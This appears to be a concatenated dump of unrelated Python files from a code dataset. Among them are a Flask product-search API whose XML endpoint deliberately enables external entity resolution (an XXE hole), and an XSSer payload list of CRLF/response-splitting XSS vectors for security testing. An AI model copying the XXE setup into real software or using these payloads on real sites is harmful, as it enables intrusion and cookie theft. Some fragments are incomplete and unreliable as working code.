from xml.sax.handler import feature_external_ges
from flask import jsonify, request
from app.models import Product, Order, Item
from app.api import bp
from app.api.auth import token_required, jwt_decode_handler
from app.api.errors import error_response
@bp.route('/products', methods=['GET'])
@token_required
def products_api():
    """Return up to 100 products as a JSON array of plain dicts."""
    return jsonify([
        {
            'id': product.id,
            'name': product.name,
            'price': product.price,
            'description': product.description,
            'image': product.image,
            'stock': product.stock
        } for product in Product.query.limit(100).all()])
@bp.route('/products-search', methods=['POST'])
@token_required
def products_search_api():
    """Search products by name/description substring; JSON body {"query": ...}.

    Responds 400 when the body is missing or not JSON (get_json() returns
    None -> AttributeError).  SQLAlchemy's contains() binds the pattern as
    a parameter, so the LIKE search is not string-concatenated SQL.
    """
    try:
        query = request.get_json().get('query')
    except AttributeError:
        return error_response(400)
    return jsonify([
        {
            'id': product.id,
            'name': product.name,
            'price': product.price,
            'description': product.description,
            'image': product.image,
            'stock': product.stock
        } for product in Product.query.filter(
            (Product.name.contains(query)) |
            (Product.description.contains(query))
        ).limit(100).all()])
@bp.route('/products-search-yaml', methods=['POST'])
@token_required
def products_search_yaml_api():
    """Same search as /products-search, but the body is YAML: {query: ...}.

    Uses yaml.safe_load, so arbitrary-object construction from the request
    body is not possible.  Responds 400 when the body is not a mapping.
    """
    try:
        query = yaml.safe_load(request.data).get('query')
    except AttributeError:
        return error_response(400)
    return jsonify([
        {
            'id': product.id,
            'name': product.name,
            'price': product.price,
            'description': product.description,
            'image': product.image,
            'stock': product.stock
        } for product in Product.query.filter(
            (Product.name.contains(query)) |
            (Product.description.contains(query))
        ).limit(100).all()])
@bp.route('/products-search-xml', methods=['POST'])
@token_required
def products_search_xml_api():
    """Same search, XML body: <search><query>...</query></search>.

    SECURITY NOTE(review): feature_external_ges is explicitly enabled,
    which makes the parser resolve external general entities -- an XXE
    vector on this untrusted request body.  This looks deliberate (the
    app appears vulnerable-by-design); confirm before reusing this code
    anywhere real, and set the feature to False otherwise.
    """
    parser = make_parser()
    parser.setFeature(feature_external_ges, True)
    try:
        document = pulldom.parseString(request.data.decode(), parser=parser)
        str_xml = ''
        # expand each element (including any external entities) and
        # re-serialize so xmltodict sees the fully-resolved document
        for event, node in document:
            if event == pulldom.START_ELEMENT:
                exp = document.expandNode(node)
                if exp:
                    str_xml += exp
                str_xml += node.toxml()
        data = xmltodict.parse(str_xml)
        query = data.get('search').get('query')
    except (SAXException, ValueError) as e:
        return error_response(400, 'XML parse error - %s' % e)
    except Exception as e:
        # NOTE(review): passes the exception object (not str) as message
        return error_response(400, e)
    try:
        return jsonify([
            {
                'id': product.id,
                'name': product.name,
                'price': product.price,
                'description': product.description,
                'image': product.image,
                'stock': product.stock
            } for product in Product.query.filter(
                (Product.name.contains(query)) |
                (Product.description.contains(query))
            ).limit(100).all()])
    except Exception as e:
        return error_response(400, 'Malformed Query %s' % query)
@bp.route('/purchase-history', methods=['GET'])
@token_required
def purchase_history_api():
    """Return the caller's orders (with items) as JSON.

    Extracts the user id from the JWT in the Authorization header.
    NOTE(review): assumes the header is present and shaped
    '<scheme> <token>' -- presumably guaranteed by @token_required;
    verify, since a missing header would raise here.
    """
    payload = jwt_decode_handler(
        request.headers.get('Authorization').split()[1])
    return jsonify([
        {
            'items': [
                {
                    'id': item.id,
                    'name': item.name,
                    'quantity': item.quantity,
                    'price': item.price
                }
                for item in Item.query.filter_by(order_id=order.id).all()
            ],
            'id': order.id,
            'date': order.date,
            'payment': order.payment_data,
        } for order in Order.query.filter_by(
            user_id=payload.get('user_id')).limit(100)])
10,542 | 1bf4a77ca7c5840946b4b2477faa89efb011fea5 | import
pygame.init() #pygame에 필요한 모든 모듈을 초기화 (init=초기화 메소드?)
screen = pygame.display.set_mode((1920,1080)) #게임창 크기 지정 width , height |
10,543 | 790fde6908068055c1c4ea0118ed02c2c5c0c5a6 | from itertools import permutations
from fractions import Fraction
# 1 for red
# 0 for blue
x = [1, 1, 1]
y = [0, 0, 0, 0]
# all combinations, excluded first blue
p = list(filter(lambda m: m[0] == 1, permutations(x + y, 2)))
# all combinations with second blue
e = list(filter(lambda m: m[1] == 0, p))
# result: 2/3
print(Fraction(len(e), len(p))) |
10,544 | 27757fade1c3a72fe03047c28eb821370e91b589 | from __future__ import print_function
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import tensorflow as tf
import models_mnist
def weight_variable(shape):
    """Return a weight Variable of *shape*, truncated-normal init (std 0.1)."""
    initial = tf.truncated_normal(shape, stddev=0.1)
    return tf.Variable(initial)
def bias_variable(shape):
    """Return a bias Variable of *shape*, constant-initialized to 0.1."""
    initial = tf.constant(0.1, shape=shape)
    return tf.Variable(initial)
def conv2d(x, W):
    """2-D convolution of *x* with kernel *W*: stride 1, SAME padding."""
    return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
    """2x2 max-pooling with stride 2 (halves spatial dims), SAME padding."""
    return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
                        strides=[1, 2, 2, 1], padding='SAME')
def cnn_classifier(x_image, keep_prob, name="classifier", reuse=True):
    """LeNet-style MNIST classifier: 2x(5x5 conv + 2x2 maxpool) -> FC -> softmax.

    Args:
        x_image: input images, indexed as [batch, 28, 28, 1] (28x28 assumed
            by the 7*7*64 flatten below).
        keep_prob: dropout keep probability for the fully-connected layer.
        name, reuse: variable_scope controls, allowing weight sharing
            across multiple call sites.
    Returns:
        Softmax class probabilities of shape [batch, 10], named 'y'.
    """
    with tf.variable_scope(name, reuse=reuse):
        # Convolutional layer 1: 1 -> 32 channels, then pool to 14x14
        W_conv1 = weight_variable([5, 5, 1, 32])
        b_conv1 = bias_variable([32])
        h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
        h_pool1 = max_pool_2x2(h_conv1)
        # Convolutional layer 2: 32 -> 64 channels, then pool to 7x7
        W_conv2 = weight_variable([5, 5, 32, 64])
        b_conv2 = bias_variable([64])
        h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
        h_pool2 = max_pool_2x2(h_conv2)
        # Fully connected layer 1: flatten 7x7x64 -> 1024 units
        h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
        W_fc1 = weight_variable([7 * 7 * 64, 1024])
        b_fc1 = bias_variable([1024])
        h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
        # Dropout (disable at eval time by feeding keep_prob=1.0)
        h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
        # Fully connected layer 2 (output layer): 1024 -> 10 classes
        W_fc2 = weight_variable([1024, 10])
        b_fc2 = bias_variable([10])
        y = tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2, name='y')
        return y
def main():
    """Train the MNIST CNN classifier for 120 steps and save a checkpoint.

    Builds the graph via models_mnist.cnn_classifier_2, optimizes only the
    'classifier' scope's variables with Adam, prints test accuracy every
    10 steps, and writes the final checkpoint to
    results/cnn_classifier-med-train/checkpoint/model.ckpt.
    """
    from tensorflow.examples.tutorials.mnist import input_data
    mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)

    # Input placeholders: flattened 28x28 images and one-hot labels.
    x = tf.placeholder(tf.float32, [None, 784], name='x')
    y_ = tf.placeholder(tf.float32, [None, 10], name='y_')
    keep_prob = tf.placeholder(tf.float32)
    x_image = tf.reshape(x, [-1, 28, 28, 1])
    y = models_mnist.cnn_classifier_2(x=x_image, name='classifier', keep_prob=keep_prob, reuse=False)

    # Loss and evaluation ops.
    cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))
    correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name='accuracy')

    # Optimize only the classifier scope's variables.
    c_var = tf.trainable_variables('classifier')
    train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy, var_list=c_var)

    # Savers: one scoped to the classifier, one for the full graph.
    c_saver = tf.train.Saver(var_list=c_var)
    saver = tf.train.Saver()

    with tf.Session() as sess:
        # tf.initialize_all_variables() was deprecated (and later removed);
        # tf.global_variables_initializer() is the supported equivalent.
        sess.run(tf.global_variables_initializer())
        max_steps = 120
        for step in range(max_steps):
            batch_xs, batch_ys = mnist.train.next_batch(50)  # pixels in 0..1
            if (step % 10) == 0:
                print(step, sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
            sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys, keep_prob: 0.5})
        print(max_steps, sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
        save_path = saver.save(sess, "results/cnn_classifier-med-train/checkpoint/model.ckpt")
        print("Model saved in path: %s" % save_path)
        print(" [*] Close main session!")
        sess.close()
main()
# import utils
# import traceback
# import numpy as np
# import tensorflow as tf
# import models_mnist as models
# import datetime
# import my_utils
# # from classifier import cnn_classifier
#
#
# """ param """
# epoch = 200
# batch_size = 128
# batch_size2 = 64
# lr = 0.0002
# z_dim = 100
# beta = 1 #diversity hyper param
# # clip = 0.01
# n_critic = 1 #
# n_generator = 1
# gan_type="experiment"
# dir="results/"+gan_type+"-"+datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
#
# np.random.seed(0)
# tf.set_random_seed(1234)
#
# # restore = False
# # ckpt_dir =
#
# ''' data '''
# data_pool = my_utils.getMNISTDatapool(batch_size, keep=[0, 1,8])
#
# """ graphs """
# generator = models.ss_generator_2
# discriminator = models.ss_discriminator
# optimizer = tf.train.AdamOptimizer
#
#
# # inputs
# real = tf.placeholder(tf.float32, shape=[None, 28, 28, 1])
# z = tf.placeholder(tf.float32, shape=[None, z_dim])
#
#
# # generator
# fake = generator(z, reuse=False, name="g1")
# fake2 = generator(z, reuse=False, name="g2")
#
# # discriminator
# r_logit = discriminator(real, reuse=False, name="d1")
# f1_logit = discriminator(fake, name="d1")
# f2_logit = discriminator(fake2, name="d1")
#
# #supplement discriminator
# f1_c = cnn_classifier(x_image=fake,keep_prob=1., reuse=False)#create model
# f2_c = cnn_classifier(x_image=fake2, keep_prob=1.)#create model
# # f1_c = discriminator(fake, reuse=False, name="d2")
# # f2_c = discriminator(fake2, name="d2")
#
# #discriminator loss
# D_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=r_logit, labels=tf.ones_like(r_logit)))
# D_loss_fake1 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=f1_logit, labels=tf.zeros_like(f1_logit)))
# D_loss_fake2 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=f2_logit, labels=tf.zeros_like(f2_logit)))
# d_loss = D_loss_real + D_loss_fake1 + D_loss_fake2
# # d_loss = D_loss_real + D_loss_fake1
#
# #supplement discriminator loss
# onehot_labels_zero = tf.one_hot(indices=tf.zeros(batch_size, tf.int32), depth=10)
# onehot_labels_one = tf.one_hot(indices=tf.ones(batch_size, tf.int32), depth=10)
# D2_loss_f1 = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=f1_c, labels=onehot_labels_zero))
# D2_loss_f2 = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=f2_c, labels=onehot_labels_one))
# # d2_loss = D2_loss_f1 + D2_loss_f2
#
# #generator loss
# g1_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=f1_logit, labels=tf.ones_like(f1_logit)))
# g2_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=f2_logit, labels=tf.ones_like(f2_logit)))
# g1_loss += beta*D2_loss_f1
# g2_loss += beta*D2_loss_f2
# g_loss = g1_loss + g2_loss
#
# # trainable variables for each network
# T_vars = tf.trainable_variables()
# # G_vars = tf.global_variables()
# d_var = [var for var in T_vars if var.name.startswith('d1')]
# g1_var = [var for var in T_vars if var.name.startswith('g1')]
# g2_var = [var for var in T_vars if var.name.startswith('g2')]
# c_var = [var for var in T_vars if var.name.startswith('classifier')]
#
# # optims
# global_step = tf.Variable(0, name='global_step',trainable=False)
# d_step = optimizer(learning_rate=lr, beta1=0.5).minimize(d_loss, var_list=d_var, global_step=global_step)
# # d2_step = optimizer(learning_rate=lr, beta1=0.5).minimize(d2_loss, var_list=d2_var)
# # g_step = optimizer(learning_rate=lr).minimize(g1_loss, var_list=g1_var)
# # g2_step = optimizer(learning_rate=lr).minimize(g2_loss, var_list=g2_var)
# G_step = optimizer(learning_rate=lr, beta1=0.5).minimize(g_loss, var_list=g1_var + g2_var)
# """ train """
# ''' init '''
# # session
# sess = tf.InteractiveSession()
#
# # saver
# saver = tf.train.Saver(max_to_keep=5)
# c_saver = tf.train.Saver(var_list=c_var)
# # summary writer
# # Send summary statistics to TensorBoard
# tf.summary.scalar('G1_loss', g1_loss)
# tf.summary.scalar('G2_loss', g2_loss)
# tf.summary.scalar('G_loss', g_loss)
# tf.summary.scalar('Discriminator_loss', d_loss)
# # tf.summary.scalar('Supplement_Discriminator_loss', d2_loss)
# images_form_g1 = generator(z, name="g1", training= False)
# images_form_g2 = generator(z, name="g2", training= False)
# tf.summary.image('G1_images', images_form_g1, 12)
# tf.summary.image('G2_images', images_form_g2, 12)
# merged = tf.summary.merge_all()
# logdir = dir+"/tensorboard"
# writer = tf.summary.FileWriter(logdir, sess.graph)
# print('Tensorboard dir: '+logdir)
#
# ''' initialization '''
# # ckpt_dir = './checkpoints/mnist_wgan'
# # utils.mkdir(ckpt_dir + '/')
# # if not utils.load_checkpoint(ckpt_dir, sess):
# sess.run(tf.global_variables_initializer())
# c_saver.restore(sess, "results/cnn_classifier/checkpoint/model.ckpt")
#
# ''' train '''
# batch_epoch = len(data_pool) // (batch_size * n_critic)
# max_it = epoch * batch_epoch
# def training(max_it, it_offset):
# print("Max iteration: " + str(max_it))
# total_it = it_offset + max_it
# for it in range(it_offset, it_offset + max_it):
#
# for i in range(n_critic):
# real_ipt = (data_pool.batch('img')+1.)/2.
# z_ipt = np.random.normal(size=[batch_size2, z_dim])
# _, _ = sess.run([d_step], feed_dict={real: real_ipt, z: z_ipt})
# # _ = sess.run([d_step], feed_dict={real: real_ipt, z: z_ipt})
#
# # train G
# for j in range(n_generator):
# z_ipt = np.random.normal(size=[batch_size2, z_dim])
# # _, _ = sess.run([g_step,g2_step], feed_dict={z: z_ipt})
# _ = sess.run([G_step], feed_dict={z: z_ipt})
#
# if it%10 == 0 :
# real_ipt = (data_pool.batch('img')+1.)/2.
# z_ipt = np.random.normal(size=[batch_size2, z_dim])
# summary = sess.run(merged, feed_dict={real: real_ipt,z: z_ipt})
# writer.add_summary(summary, it)
#
# var = raw_input("Continue training for %d iterations?" % max_it)
# if var.lower() == 'y':
# training(max_it, it_offset + max_it)
#
# total_it = 0
# try:
# training(max_it,0)
# total_it = sess.run(global_step)
# print("Total iterations: "+str(total_it))
# except Exception, e:
# traceback.print_exc()
# finally:
# var = raw_input("Save sample images?")
# if var.lower() == 'y':
# list_of_generators = [images_form_g1, images_form_g2] # used for sampling images
# list_of_names = ['g1-it%d.jpg'%total_it,'g2-it%d.jpg'%total_it]
# rows = 10
# columns = 10
# sample_imgs = sess.run(list_of_generators, feed_dict={z: np.random.normal(size=[rows*columns, z_dim])})
# save_dir = dir + "/sample_imgs"
# utils.mkdir(save_dir + '/')
# for imgs,name in zip(sample_imgs,list_of_names):
# my_utils.saveSampleImgs(imgs=imgs, full_path=save_dir+"/"+name, row=rows,column=columns)
# # save checkpoint
# save_path = saver.save(sess, dir+"/checkpoint/model.ckpt")
# print("Model saved in path: %s" % save_path)
# print(" [*] Close main session!")
# sess.close()
|
10,545 | 80fee63893a9011e80471fe168327e30cd6a80a1 |
#calss header
class _MARSHALS():
def __init__(self,):
self.name = "MARSHALS"
self.definitions = marshal
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['marshal']
|
class Intcode:
    """Intcode virtual machine with sparse memory and relative addressing.

    `run()` executes until halt (True) or until an input instruction finds
    the input queue empty (False), allowing cooperative resumption.
    """

    def __init__(self, program, input, output):
        # Sparse memory: any address never written reads as 0.
        self.memory = dict(enumerate(program))
        self.input = input    # pending input values, consumed from the front
        self.output = output  # collects every opcode-4 output
        self.ip = 0           # instruction pointer
        self.base = 0         # relative base for mode-2 addressing

    def get_value_at(self, address):
        """Read memory, defaulting unwritten cells to 0."""
        return self.memory.get(address, 0)

    def get_value(self, mode, offset):
        """Fetch the parameter at ip+offset under the given addressing mode."""
        raw = self.get_value_at(self.ip + offset)
        if mode == 0:       # position mode: raw is an absolute address
            return self.get_value_at(raw)
        if mode == 2:       # relative mode: raw offsets the relative base
            return self.get_value_at(self.base + raw)
        return raw          # immediate mode

    def set_value(self, mode, offset, value):
        """Store value at the address named by the parameter at ip+offset."""
        target = self.get_value_at(self.ip + offset)
        if mode == 2:
            target += self.base
        self.memory[target] = value

    def run(self):
        """Interpret instructions until halt or input starvation."""
        while True:
            instruction = self.get_value_at(self.ip)
            opcode = instruction % 100
            m1 = instruction // 100 % 10
            m2 = instruction // 1000 % 10
            m3 = instruction // 10000 % 10
            if opcode in (1, 2):            # add / multiply
                a = self.get_value(m1, 1)
                b = self.get_value(m2, 2)
                self.set_value(m3, 3, a + b if opcode == 1 else a * b)
                self.ip += 4
            elif opcode == 3:               # read one input value
                if not self.input:
                    return False            # pause: nothing to read yet
                self.set_value(m1, 1, self.input.pop(0))
                self.ip += 2
            elif opcode == 4:               # emit one output value
                self.output.append(self.get_value(m1, 1))
                self.ip += 2
            elif opcode in (5, 6):          # jump-if-true / jump-if-false
                nonzero = self.get_value(m1, 1) != 0
                if nonzero == (opcode == 5):
                    self.ip = self.get_value(m2, 2)
                else:
                    self.ip += 3
            elif opcode in (7, 8):          # less-than / equals
                a = self.get_value(m1, 1)
                b = self.get_value(m2, 2)
                hit = a < b if opcode == 7 else a == b
                self.set_value(m3, 3, 1 if hit else 0)
                self.ip += 4
            elif opcode == 9:               # adjust the relative base
                self.base += self.get_value(m1, 1)
                self.ip += 2
            elif opcode == 99:              # halt
                return True
|
10,547 | 7468f96da6b94a039e2ce67020b970e7f1ce12ae | """
$Id$
This file is part of the xsser project, http://xsser.sourceforge.net.
Copyright (c) 2011/2012/2013/2014/2015 - <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 3 of the License.
xsser is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with xsser; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
## This file contains different XSS fuzzing vectors to inject in payloads and browser supports.
## If you have some new vectors, please email me to [epsylon@riseup.net] and will be added to XSSer framework.
## Thats all.
###
## Happy Cross Hacking! ;)
# HTTP response-splitting (CRLF injection) fuzzing vectors.  Each entry pairs
# a URL-encoded payload (%0d%0a / %0D%0A encode CR/LF) with the browser
# support label XSSer reports when the vector fires.
HTTPrs_vectors = [
    # Terminate the real response (Content-Length: 0) and append a fake one.
    { 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A<html>XSS</html>
""",
      'browser' : """[Induced Injection]""" },
    # Injected second response carrying a script payload.
    { 'payload' : """XSS%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("XSS")</script>""",
      'browser' : """[Induced Injection]""" },
    # Header injection: set an attacker-controlled cookie.
    { 'payload' : """%0D%0ASet-Cookie%3AXSS""",
      'browser' : """[Induced Injection]""" },
    # Force an HTML content type and inject markup / script.
    { 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22XSS%22)%3E""",
      'browser' : """[Induced Injection]""" },
    { 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com""",
      'browser' : """[Induced Injection]""" },
    { 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
      'browser' : """[Induced Injection]""" },
    # Injection through the Expect request header.
    { 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
      'browser' : """[Induced Injection]""" },
    # Cache-poisoning variants: Last-Modified / Cache-Control / Pragma headers.
    { 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1""",
      'browser' : """[Induced Injection]"""},
    { 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
""",
      'browser' : """[Induced Injection]"""},
    { 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
""",
      'browser' : """[Induced Injection]""" },
    # UTF-7 charset trick to smuggle the script past naive filters.
    { 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('%58%53%53');%2BADw-/script%2BAD4-
""",
      'browser' : """[Induced Injection]""" }
]
|
10,548 | e99b1ae97b9834288b6606fa874e45850187c9e4 | """
Given the root of a binary tree and an integer distance. A pair of two different leaf nodes of a binary tree is said to be good if the length of the shortest path between them is less than or equal to distance.
Return the number of good leaf node pairs in the tree.
Example 1:
Input: root = [1,2,3,null,4], distance = 3
Output: 1
Explanation: The leaf nodes of the tree are 3 and 4 and the length of the shortest path between them is 3. This is the only good pair.
Example 2:
Input: root = [1,2,3,4,5,6,7], distance = 3
Output: 2
Explanation: The good pairs are [4,5] and [6,7] with shortest path = 2. The pair [4,6] is not good because the length of the shortest path between them is 4.
Example 3:
Input: root = [7,1,4,6,null,5,3,null,null,null,null,null,2], distance = 3
Output: 1
Explanation: The only good pair is [2,5].
Example 4:
Input: root = [100], distance = 1
Output: 0
Example 5:
Input: root = [1,1,1], distance = 2
Output: 1
Constraints:
The number of nodes in the tree is in the range [1, 2^10].
Each node's value is between [1, 100].
1 <= distance <= 10
"""
# Definition for a binary tree node.
class TreeNode:
    """Plain binary-tree node: a value plus optional left/right children."""

    def __init__(self, val=0, left=None, right=None):
        self.val = val      # payload value
        self.left = left    # left child or None
        self.right = right  # right child or None
class Solution:
    """Counts pairs of leaves whose mutual path length is at most `distance`."""

    def countPairs(self, root: "TreeNode", distance: int) -> int:
        """Return the number of good leaf pairs in the tree rooted at `root`.

        A pair of distinct leaves is "good" when the shortest path between
        them has length <= distance.
        """
        res = [0]  # single-cell accumulator shared by the recursion
        self.dfs(root, distance, res)
        return res[0]

    # Fix: the original annotated `res: List[int]` without importing
    # typing.List (NameError at class-definition time) and annotated the
    # return as None although lists are returned; use builtin/string
    # annotations instead.
    def dfs(self, root: "TreeNode", distance: int, res: list) -> list:
        """Post-order helper.

        Returns the distances from `root` down to each leaf of its subtree,
        keeping only distances that could still form a good pair
        (n + 1 < distance after the climb).  Pairs of leaves that meet at
        this node are counted into res[0].
        """
        if not root:
            return []
        if not root.left and not root.right:
            return [1]  # a leaf is one edge away from its parent
        left = self.dfs(root.left, distance, res)
        right = self.dfs(root.right, distance, res)
        # Leaves in the left and right subtrees pair up through this node.
        res[0] += sum(l + r <= distance for l in left for r in right)
        # Each distance grows by one edge going up; prune hopeless ones.
        return [n + 1 for n in left + right if n + 1 < distance]
|
# Read a student's name and two term grades, store the average and the
# pass/fail status in a dict, then print every key/value pair.
aluno0 = {'Nome': str(input('Digite o nome do aluno: ')).strip().capitalize()}
nota1 = float(input(f'Digite a nota do {aluno0["Nome"]} no 1° bimestre: '))
nota2 = float(input(f'Digite a nota do {aluno0["Nome"]} no 2° bimestre: '))
# Simple average of the two term grades.
aluno0['Media'] = (nota1 + nota2) / 2
# Status: below 5 fails, 5 to 6 goes to resit ("Recuperação"), 6+ passes.
if aluno0['Media'] < 5:
    aluno0['Situação'] = 'Reprovado'
elif 5 <= aluno0['Media'] < 6:
    aluno0['Situação'] = 'Recuperação'
else:
    aluno0['Situação'] = 'Aprovado'
# Display the whole record.
for k, v in aluno0.items():
    print(f'{k}: {v}')
# The instructor's solution is practically the same.
# Challenge 090 -> Write a program that reads a student's name and average,
# also storing the status (passed or failed) in a dictionary.
# Finally show the structure's contents on screen.
# Nome: input
# Average of (Nome): input (example uses 6)
# output:
# Nome:
# Media:
# Situação: reprovado (or) aprovado
10,550 | defc2067dc521b3d7e9c75d74855a72379679759 | import unittest
from parameterized import parameterized
import numpy as np
from src.dataset.preprocessing.images import _GroundTruthClassMapper
from src.dataset.utils.mapping_utils import Color2IdMapping
from test.utils import ArrayContentSpec, assembly_array
class GroundTruthClassMapper(unittest.TestCase):
    """Tests that _GroundTruthClassMapper converts RGB ground-truth images
    into single-channel class-id maps according to a color -> id mapping.

    Each parameterized case supplies (color2id, input_image_spec,
    expected_output_spec); the specs are ArrayContentSpec tuples consumed
    by test.utils.assembly_array as (height, width, channels, regions,
    dtype).  Judging by the cases, each region tuple appears to be
    ((start), (end), channel, fill-value) -- confirm against
    test.utils.assembly_array.
    """
    @parameterized.expand([
        # Case 1: all-black 10x10 image -> every pixel maps to class id 0.
        [
            {
                (0, 0, 0): 0,
                (1, 0, 0): 1,
                (0, 1, 0): 2,
                (0, 0, 1): 3
            },
            (
                10, 10, 3,
                [],
                np.uint8
            ),
            (
                10, 10, 1,
                [],
                np.uint8
            )
        ],
        # Case 2: a region with channel 0 set to 1 (color (1,0,0)) maps to 101.
        [
            {
                (0, 0, 0): 0,
                (1, 0, 0): 101,
                (0, 1, 0): 2,
                (0, 0, 1): 3
            },
            (
                10, 10, 3,
                [((0, 0), (5, 5), 0, 1)],
                np.uint8
            ),
            (
                10, 10, 1,
                [((0, 0), (5, 5), 0, 101)],
                np.uint8
            )
        ],
        # Case 3: two colored regions map independently (ids 101 and 3).
        [
            {
                (0, 0, 0): 0,
                (1, 0, 0): 101,
                (0, 1, 0): 2,
                (0, 0, 1): 3
            },
            (
                10, 10, 3,
                [
                    ((0, 0), (5, 5), 0, 1),
                    ((9, 9), (10, 10), 2, 1),
                ],
                np.uint8
            ),
            (
                10, 10, 1,
                [
                    ((0, 0), (5, 5), 0, 101),
                    ((9, 9), (10, 10), 0, 3),
                ],
                np.uint8
            )
        ]
    ])
    def test_mapping(self,
                     color2id: Color2IdMapping,
                     input_image_spec: ArrayContentSpec,
                     expected_output_spec: ArrayContentSpec
                     ) -> None:
        """Assemble the RGB input, map it, and compare with the expected ids."""
        # given
        mapper = _GroundTruthClassMapper(
            color2id=color2id
        )
        input_image = assembly_array(*input_image_spec)
        # Expected output is squeezed to drop the singleton channel axis.
        expected_output = np.squeeze(assembly_array(*expected_output_spec))
        # when
        result = mapper.map_classes_id(input_image)
        # then
        self.assertTrue(np.array_equal(result, expected_output))
|
10,551 | cf2e2a1835bb07650b6c66285b78b116cf522690 | import pytest
import random
from merge_sort import merge_sort
def test_func_exists():
    # Smoke test: merge_sort is importable and callable on a minimal input.
    merge_sort([1])
def test_sort():
    """merge_sort orders a small shuffled list ascending."""
    assert merge_sort([1, 5, 3, 2, 4]) == [1, 2, 3, 4, 5]
def test_all_same():
    """A list of identical values comes back unchanged."""
    sevens = [3] * 7
    assert merge_sort(sevens) == [3] * 7
def test_sort_zero():
    # An empty list is treated as invalid input and must raise.
    with pytest.raises(Exception):
        merge_sort([])
def test_sort_lots():
    """1000 random ints come back in nondecreasing order.

    The original shadowed the builtin `input` and used
    `expected = input; expected.sort()`, i.e. an alias of the very list it
    had just handed to merge_sort -- if merge_sort mutated its argument the
    oracle was computed from mutated data.  Use an independent sorted copy.
    """
    values = [random.randint(1, 1000) for _ in range(1000)]
    expected = sorted(values)  # independent oracle, not an alias
    assert merge_sort(values) == expected
|
10,552 | 862ab0a9be465ce16b3d273a5eb8de3a94a80452 | # mdpAgents.py
# parsons/20-nov-2017
#
# Version 1
#
# The starting point for CW2.
#
# Intended to work with the PacMan AI projects from:
#
# http://ai.berkeley.edu/
#
# These use a simple API that allow us to control Pacman's interaction with
# the environment adding a layer on top of the AI Berkeley code.
#
# As required by the licensing agreement for the PacMan AI we have:
#
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
# The agent here is was written by Simon Parsons, based on the code in
# pacmanAgents.py
from pacman import Directions
from game import Agent
import api
# Taken from mapAgents.py lab solutions on keats
# Draws up a grid for the map
# Taken from mapAgents.py lab solutions on keats
# Draws up a grid for the map
class Grid:
    """2-D value grid addressed as (x, y) with storage row-major: grid[y][x].

    NOTE: this is Python 2 code (the `display` method uses print statements).
    """
    def __init__(self, width, height):
        # Build `height` rows of `width` zeros.
        subgrid = []
